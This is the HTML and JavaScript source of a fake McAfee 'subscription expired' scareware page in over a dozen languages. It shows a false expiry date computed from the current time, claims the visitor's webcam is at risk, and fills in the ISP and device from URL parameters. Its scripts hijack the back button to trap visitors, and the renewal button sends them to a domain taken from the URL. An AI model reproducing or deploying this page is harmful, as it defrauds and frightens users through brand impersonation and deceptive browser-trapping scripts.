<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>McAfee Antivirus Protection Expired</title>
<link rel="icon" type="image/vnd.microsoft.icon" href="favicon.ico">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style type="text/css">
.white{display:none}
body {
  width:100%;
  max-width: 700px;
  padding:0;
  margin: 0 auto;
  text-align: left;
  background: #e2e2e2 no-repeat  center center fixed; ;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
  font-family: Arial;
}
.main-wrapper{margin-top:25px;}
.wrapper {
  background: #fff url(assets/grey-bg.png) top right no-repeat;
  /*text-align: center;*/
  margin: 0px auto;
  padding: 20px 40px;
  padding-bottom: 40px;
  font-size: 15px;
  color: #808080;
  position: relative;
  box-shadow: 1px 1px 5px #666;
  border-top: 80px solid #d31346;
}
.header {
    text-align: center;
    background: #fff;
	    padding: 5px;
}
.header img{
max-width: 100%;
}

#img-prod {
    margin: 30px 0;
    max-width: 285px;
}
h2 {
  font-weight: normal;
  font-size: 26px;
  position: absolute;
  margin-top: -70px;
  margin-left: 70px;
  color: #fff;
}
h4 {
  font-size: 17px;
  margin-bottom: 0px;
  border-top: 1px solid #ccc;
  padding-top: 1em;
}
@media screen and (max-width: 992px) {
	h2{
	  margin-top: -90px;
	  margin-left: 0;
	}
}

.button {
  color: #fff;
  display: block;
  text-decoration: none;
  font-size: 20px;
  font-weight: bold;
  padding: 18px;
  text-align: center;
  background: #0083ff;
  border-radius: 5px;
  border: 0;

}
.button:hover {
    background: #1f64a5;
    cursor: pointer;
}
p {
  line-height: 1.2em;
}
ul li {
	display:inline-block;
  margin-bottom: 6px;
  background: url(assets/tick_small.gif) no-repeat left top;
  padding-left: 18px;
  list-style: none;
  margin-left: -20px;
}
#audioplayer {
  margin-top: -9999em;
}
.offer-button{
	color:white;
	text-decoration:none;
	    display: block;
	
}
.button{	position:relative;    overflow: hidden;}
.button:before {
  content: "";
  position: absolute;
  width: 150px;
  height: 100%;
  background-image: linear-gradient(
    120deg,
    rgba(255, 255, 255, 0) 30%,
    rgba(255, 255, 255, 0.8),
    rgba(255, 255, 255, 0) 70%
  );
  top: 0;
  left: -100px;
    animation: shine 5s infinite linear; /* Animation */
}
@keyframes shine {
  0% {
    left: -100px;
  }
  20% {
    left: 100%;
  }
  100% {
    left: 100%;
  }
}



.pulse{	animation: pulse 4s infinite;}
@keyframes pulse {
	0% {
		transform: scale(0.96);
	}
	
	50% {
		transform: scale(1);
	}
	
	100% {
		transform: scale(0.96);
	}
}



	@media screen and (max-width: 767px) {
	.main-wrapper {
		margin: 15px;
	}
	.header img {
		height: 37px;
	}
	h4 {
	    margin-top: 0;
		padding-top: 10px;
		margin-bottom: 10px;
		font-size: 15px;
	}

	.wrapper {
		margin: 0px auto;
		padding:0px 10px 42px;
		font-size: 13px;
		position: relative;
		box-shadow: 1px 1px 5px #666;
		border-top: 0;
	}
	.wrapper h2 {
		font-size: 16px;
		left: 0;
		right: 0;
		background: #d31346;
		text-align: center;
		top: 0px;
		margin: 0 auto;
		padding: 5px;
		position: unset;
	}
	img#img-prod {margin: 0;max-width: 230px;}
	p {margin: 12px 0;}
	ul {margin: 0;padding: 0;}
	ul li {margin-left: 4px;}
	}
@media screen and (max-width:320px) {
.main-wrapper {margin: 8px;}
.wrapper h2 {font-size: 14px;}
img#img-prod {max-width: 210px;}
h4 {font-size: 14px;}
}
</style>
<script>
function getURLParameter(name) {
return decodeURI(
(RegExp(name + '=' + '(.*?)(&|$)').exec(location.search)||[,null])[1] || ''
);
}
</script>
<script>
  // translation script
    var getUrlParameter = function getUrlParameter(sParam) {
    var sPageURL = window.location.search.substring(1),
        sURLVariables = sPageURL.split('&'),
        sParameterName,
        i;

    for (i = 0; i < sURLVariables.length; i++) {
        sParameterName = sURLVariables[i].split('=');

        var key = decodeURIComponent(sParameterName[0]);
        var value = decodeURIComponent(sParameterName[1]);

        if (key === sParam) {
            return value === undefined ? true : value;
        }
    }
};
	var lang = getUrlParameter('language').split('-',1);
	
		//ISP script
		var isp = getURLParameter('isp');
		//to show one First word only
		var isp = isp.trim().split(' ')[0];
		//If isp unknown it will shows ISP
		
	if ( isp == "unknown" || isp == "Unknown" || isp == " " || isp ==null || isp == "undefined" ||   getURLParameter('isp') == "unknown") { 
		isp = " ";
	} 
</script>
</head><body>
<div class="main-wrapper" id="wraper">
<div class="header"><img src="./assets/m_logo.png"></div>
<div class="wrapper">
<h2 class="black" id="txt1">Your McAfee Subscription Has Expired!</h2>
<p><span class="black" id="txt2">Your subscription of McAfee Total Protection has expired on </span>
<strong><script language="Javascript">
var alerttext1 = "System Warning: Your";
var device_name =  getURLParameter('device_brand'); 
var alerttext2 = "May Be At Risk";
var alerttext3 = "Protect Now";

if ( device_name == "unknown" || device_name == "Unknown" || device_name == "") { 
	device_name = "device";
} 


// Array of month Names
var monthNames = new Array("January","February","March","April","May","June","July","August","September","October","November","December");
if (lang == 'es') {
  var monthNames = new Array("enero", "febrero", "marzo", "abril", "mayo", "junio", "julio", "agosto", "septiembre", "octubre", "noviembre","diciembre");
  var alerttext1 = "Advertencia del sistema: su";
  var alerttext2 = " puede estar en riesgo";
  var alerttext3 = "Proteger ahora";
}
if (lang == 'pt') {
  var monthNames = new Array("Janeiro", "Fevereiro", "Março", "Abril", "Maio", "Junho", "Julho", "Agosto", "Setembro", "Outubro", "Novembro", "Dezembro");
}
if (lang == 'cz') {
  var monthNames = new Array("Leden", "Únor", "Březen", "Duben", "Květen", "Červen", "Červenec", "Srpen", "Září", "Říjen", "Listopad", "Prosinec");
}
if (lang == 'de') {
  var monthNames = new Array("Januar", "Februar", "März", "April", "Mai", "Juni", "Juli", "August", "September", "Oktober", "November", "Dezember");
}
if (lang == 'it') {
  var monthNames = new Array("Gennaio", "Febbraio", "Marzo", "Aprile", "Maggio", "Giugno", "Luglio", "Agosto", "Settembre", "Ottobre", "Novembre", "Dicembre");
}
//Chinese (ZH) (traditional)
if (lang == 'zh') {
var monthNames = new Array("一月","二月","三月","四月","五月","六月","七月","八月","九月","十月", "十一月","十二月");
}
// Korean (KR)
if (lang == 'kr') {
var monthNames = new Array("1월","2월","3월","4월","5월","6월","7월","8월","9월","10월","11월","12월");
}
//Dutch (NL),
if (lang == 'nl') {
var monthNames = new Array("Januari", "Februari", "Maart", "April", "Mei", "Juni", "Juli", "Augustus", "September", "Oktober", "November", "December");
}

if (lang == 'fr') {
  var monthNames = new Array("Janvier", "Février", "Mars", "Avril", "Mai", "Juin", "Juillet", "Août", "Septembre", "Octobre", "Novembre", "Décembre");
}
if (lang == 'dk') {
  var monthNames = new Array("Januar","Februar","Marts","April","Maj","Juni","Juli","August","September","Oktober","November","December");
}
if (lang == 'no') {
  var monthNames = new Array("januar", "februar", "mars", "april", "mai", "juni", "juli", "august", "september", "oktober", "november", "desember");
}
if (lang == 'fi') {
  var monthNames = new Array("tammikuu", "helmikuu", "maaliskuu", "huhtikuu", "toukokuu", "kesäkuu", "heinäkuu", "elokuu", "syyskuu", "lokakuu", "marraskuu", "joulukuu");
}
if (lang == 'se') {
  var monthNames = new Array("Januari","Februari","Mars","April","Maj","Juni","Juli","Augusti","September","Oktober","November","December");
}


var now = new Date(Date.now() - 90*60*60*1000);
document.write(monthNames[now.getMonth()] + " " + now.getDate() + ", " + now.getFullYear());
</script></strong>.</p>
<p><span id="txt3">After the expiration date, your computer will become susceptible to many different virus threats.</span> <b id="txt3a">Your webcam privacy is at risk.</b></p>
<h4 class="black" style="color:orange"><span id="txt4">Your computer is unprotected, exposing it to viruses and other malware...</span></h4>
<ul>
<li><font color="green" id="txt5">Available</font> (<font color="red"><strong>-55%</strong></font>) <span id="txt6">Renewal Discount</span>: <span id="theTime" style="color:red;"></span>
<span style="color:red; font-weight:bold;">
<script language="Javascript">
	var now = new Date(Date.now());
	document.write(monthNames[now.getMonth()] + " " +
	 now.getDate() + ", " + now.getFullYear());
	</script>
</span>
</li></ul>
<span style="text-align:center;display:block;"><img id="img-prod" src="./assets/product_serial.png"></span>
<a href="javascript:void(0)" onclick="out();PreventExitPop=false" rel="noreferrer" target="_blank" class="offer-button pulse"><div class="button"><span id="txt7">Renew Subscription</span></div></a>
</div>
</div>
<script type="text/javascript">
	//address bar script with adjustment
		setTimeout(function(){  
		window.history.pushState('/', 'Other Page', '/');
		window.history.pushState('/', 'Initial Page', '/');
		 }, 3000); 

		 window.addEventListener("popstate", function(e) {
			if(document.URL.indexOf("/") >= 0){
				document.location.href = document.location;
			}
		 });
	 
	 
//if use addressbar then outbound link will be like this
var url_parameter = getURLParameter("domain");
function out(){window.onbeforeunload=null,window.location="https://"+url_parameter+"/index.php?lp=1&to_offer=1&place=cta"}
	 
//backbutton to keep current page
! function () {
var t;
try {
for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
onpopstate = function (t) {
t.state && location.replace("#");
audio.play();
}
} catch (o) {}

}(); 
		

  //English 
  if (lang == 'en') {
		document.getElementById('txt1').innerHTML = 'Your McAfee Subscription Has Expired!';
		document.getElementById('txt2').innerHTML = 'Your subscription to McAfee Total Protection has expired on';
		document.getElementById('txt3').innerHTML = 'After the expiration date, your computer will become susceptible to many different virus threats:';
		document.getElementById('txt3a').innerHTML = 'Your webcam privacy is at risk.';
		document.getElementById('txt4').innerHTML = 'Your computer is unprotected, exposing it to viruses and other malware...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Renewal Discount';
		document.getElementById('txt7').innerHTML = '✔️ Renew Subscription Now';
  }
  
  //Spanish (es)
  if (lang == 'es') {
		document.getElementById('txt1').innerHTML = '¡Su suscripción a McAfee ha caducado!';
		document.getElementById('txt2').innerHTML = 'Su suscripción a McAfee Total Protection expiró el';
		document.getElementById('txt3').innerHTML = 'Después de la fecha de vencimiento, su computadora será susceptible a muchas amenazas de virus diferentes:'; 
		document.getElementById('txt3a').innerHTML = 'La privacidad de su cámara web está en riesgo.';
		document.getElementById('txt4').innerHTML = 'Su computadora está desprotegida, exponiéndola a virus y otro malware... ';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Descuento de renovación';
		document.getElementById('txt7').innerHTML = '✔️ Renovar suscripción ahora';	
  }
 
  //Portuguese (pt)
  if (lang == 'pt') {
		document.getElementById('txt1').innerHTML = 'A sua subscrição da McAfee expirou!';
		document.getElementById('txt2').innerHTML = 'A sua subscrição do McAfee Total Protection expirou em';
		document.getElementById('txt3').innerHTML = 'Após a data de expiração, seu computador ficará suscetível a diversas ameaças de vírus:';
		document.getElementById('txt3a').innerHTML = 'A privacidade da sua webcam está em risco.';
		document.getElementById('txt4').innerHTML = 'Seu computador está desprotegido, expondo-o a vírus e outros malwares...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Desconto de renovação';
		document.getElementById('txt7').innerHTML = '✔️ Renovar a subscrição agora';

  }
  //Czech (cz)
  if (lang == 'cz') {
		document.getElementById('txt1').innerHTML = 'Vaše předplatné McAfee vypršelo!';
		document.getElementById('txt2').innerHTML = 'Vaše předplatné služby McAfee Total Protection vypršelo dne.';
		document.getElementById('txt3').innerHTML = 'Po datu vypršení platnosti se váš počítač stane náchylným k mnoha různým virovým hrozbám:';
		document.getElementById('txt3a').innerHTML = 'Vaše soukromí webové kamery je ohroženo.';
		document.getElementById('txt4').innerHTML = 'Your computer is unprotected, exposing it to viruses and other malware...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Sleva za obnovení';
		document.getElementById('txt7').innerHTML = '✔️ Obnovit předplatné nyní';
  }
  //German (de)
  if (lang == 'de') {
		document.getElementById('txt1').innerHTML = 'Ihr McAfee-Abonnement ist abgelaufen!';
		document.getElementById('txt2').innerHTML = 'Ihr Abonnement für McAfee Total Protection ist abgelaufen am';
		document.getElementById('txt3').innerHTML = 'Nach Ablauf des Ablaufdatums wird Ihr Computer anfällig für viele verschiedene Virenbedrohungen:';
		document.getElementById('txt3a').innerHTML = 'Die Privatsphäre Ihrer Webcam ist gefährdet.';
		document.getElementById('txt4').innerHTML = 'Ihr Computer ist ungeschützt und somit Viren und anderer Malware ausgesetzt ...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Verlängerungsrabatt';
		document.getElementById('txt7').innerHTML = '✔️ Jetzt Abo verlängern';
  }
  //Italian (it)
  if (lang == 'it') {
		document.getElementById('txt1').innerHTML = 'L\'abbonamento a McAfee è scaduto!';
		document.getElementById('txt2').innerHTML = 'L\'abbonamento a McAfee Total Protection è scaduto il giorno';
		document.getElementById('txt3').innerHTML = 'Dopo la data di scadenza, il computer diventa suscettibile a molte minacce virali diverse:';
		document.getElementById('txt3a').innerHTML = 'La privacy della vostra webcam è a rischio.';
		document.getElementById('txt4').innerHTML = 'Il computer non è protetto e si espone a virus e altre minacce informatiche...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Sconto per il rinnovo';
		document.getElementById('txt7').innerHTML = '✔️ Rinnova ora l\'abbonamento';
  }
   
   //Chinese (ZH) (traditional) 
  if (lang == 'zh') {
		document.getElementById('txt1').innerHTML = '您的 McAfee 訂閱已過期！';
		document.getElementById('txt2').innerHTML = '您的 McAfee Total Protection 訂閱已過期';
		document.getElementById('txt3').innerHTML = '過期後，您的計算機將容易受到許多不同的病毒威脅：';
		document.getElementById('txt3a').innerHTML = '您的網絡攝像頭隱私面臨風險。';
		document.getElementById('txt4').innerHTML = '您的計算機未受保護，容易受到病毒和其他惡意軟件的攻擊......';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = '續訂折扣';
		document.getElementById('txt7').innerHTML = '✔️ 立即續訂';
  } 
     //Korean (KR) 
  if (lang == 'kr') {
		document.getElementById('txt1').innerHTML = 'McAfee 제품 정보 사용 기간이 만료되었습니다!';
		document.getElementById('txt2').innerHTML = 'McAfee Total Protection의 제품 정보 사용 기간이 다음 날짜에 만료되었습니다.';
		document.getElementById('txt3').innerHTML = '만료일이 지나면 컴퓨터가 다양한 바이러스 위협에 노출될 수 있습니다:';
		document.getElementById('txt3a').innerHTML = '웹캠 개인정보가 위험에 처할 수 있습니다.';
		document.getElementById('txt4').innerHTML = '컴퓨터가 보호되지 않아 바이러스 및 기타 멀웨어에 노출되어 있습니다...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = '갱신 할인';
		document.getElementById('txt7').innerHTML = '✔️ 지금 구독 갱신하기';
  } 
     //Dutch (NL) 
  if (lang == 'nl') {
		document.getElementById('txt1').innerHTML = 'Uw McAfee abonnement is verlopen!';
		document.getElementById('txt2').innerHTML = 'Uw abonnement op McAfee Total Protection is verlopen op';
		document.getElementById('txt3').innerHTML = 'Na de vervaldatum wordt je computer vatbaar voor veel verschillende virusbedreigingen:';
		document.getElementById('txt3a').innerHTML = 'De privacy van je webcam is in gevaar.';
		document.getElementById('txt4').innerHTML = 'Je computer is onbeschermd, waardoor hij wordt blootgesteld aan virussen en andere malware...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Verlenging Korting';
		document.getElementById('txt7').innerHTML = '✔️ Abonnement verlengen';
  } 
  
  //French (FR) 
  if (lang == 'fr') {
		document.getElementById('txt1').innerHTML = 'Votre abonnement McAfee a expiré !';
		document.getElementById('txt2').innerHTML = 'Votre abonnement à McAfee Total Protection a expiré le';
		document.getElementById('txt3').innerHTML = 'Après la date d\'expiration, votre ordinateur devient vulnérable à de nombreuses menaces virales :';
		document.getElementById('txt3a').innerHTML = 'La confidentialité de votre webcam est menacée.';
		document.getElementById('txt4').innerHTML = 'Votre ordinateur n\'est pas protégé, ce qui l\'expose aux virus et autres logiciels malveillants...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Remise de renouvellement';
		document.getElementById('txt7').innerHTML = '✔️ Renouveler l\'abonnement maintenant';
  }  
  
  // Danish (DK)
  if (lang == 'dk') {
		document.getElementById('txt1').innerHTML = 'Dit McAfee-abonnement er udløbet!';
		document.getElementById('txt2').innerHTML = 'Dit abonnement på McAfee Total Protection er udløbet den';
		document.getElementById('txt3').innerHTML = 'Efter udløbsdatoen vil din computer blive modtagelig for mange forskellige virustrusler:';
		document.getElementById('txt3a').innerHTML = 'Dit webcams privatliv er i fare.';
		document.getElementById('txt4').innerHTML = 'Din computer er ubeskyttet og udsat for virus og anden malware...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Fornyelsesrabat';
		document.getElementById('txt7').innerHTML = '✔️ Forny abonnementet nu';
  }
  //Norwegian (NO) 
  if (lang == 'no') {
		document.getElementById('txt1').innerHTML = 'McAfee-abonnementet ditt er utløpt!';
		document.getElementById('txt2').innerHTML = 'Abonnementet ditt på McAfee Total Protection har utløpt den';
		document.getElementById('txt3').innerHTML = 'Etter utløpsdatoen vil datamaskinen bli utsatt for mange ulike virustrusler:';
		document.getElementById('txt3a').innerHTML = 'Personvernet til webkameraet ditt er i fare.';
		document.getElementById('txt4').innerHTML = 'Datamaskinen din er ubeskyttet og dermed utsatt for virus og annen skadelig programvare...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Fornyelsesrabatt';
		document.getElementById('txt7').innerHTML = '✔️ Forny abonnementet nå';
  }  

  // Finnish (FI)
  if (lang == 'fi') {
		document.getElementById('txt1').innerHTML = 'McAfee-tilauksesi on päättynyt!';
		document.getElementById('txt2').innerHTML = 'McAfee Total Protection -tilauksesi on päättynyt.';
		document.getElementById('txt3').innerHTML = 'Vanhentumispäivän jälkeen tietokoneesi on altis monille erilaisille virusuhkille:';
		document.getElementById('txt3a').innerHTML = 'Webkamerasi yksityisyys on vaarassa.';
		document.getElementById('txt4').innerHTML = 'Tietokoneesi on suojaamaton, jolloin se on alttiina viruksille ja muille haittaohjelmille...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Uusiutumisalennus';
		document.getElementById('txt7').innerHTML = '✔️ Tilauksen uusiminen nytw';
  } 
  // Swedish (SE).
  if (lang == 'se') {
		document.getElementById('txt1').innerHTML = 'Din prenumeration på McAfee har gått ut!';
		document.getElementById('txt2').innerHTML = 'Din prenumeration på McAfee Total Protection har löpt ut den';
		document.getElementById('txt3').innerHTML = 'Efter utgångsdatumet blir din dator mottaglig för många olika virushot:';
		document.getElementById('txt3a').innerHTML = 'Din webbkameras integritet är i fara.';
		document.getElementById('txt4').innerHTML = 'Din dator är oskyddad, vilket gör den sårbar för virus och annan skadlig kod...';
		document.getElementById('txt5').innerHTML = '' +isp+ '';
		document.getElementById('txt6').innerHTML = 'Rabatt vid förnyelse';
		document.getElementById('txt7').innerHTML = '✔️ Förnya prenumerationen nu';
  }  
  

//alert("\n\n⚠" +alerttext1+ " " +device_name+ " "+alerttext2+ "\n\n" +alerttext3+"\n\n"); 
</script>
</body></html>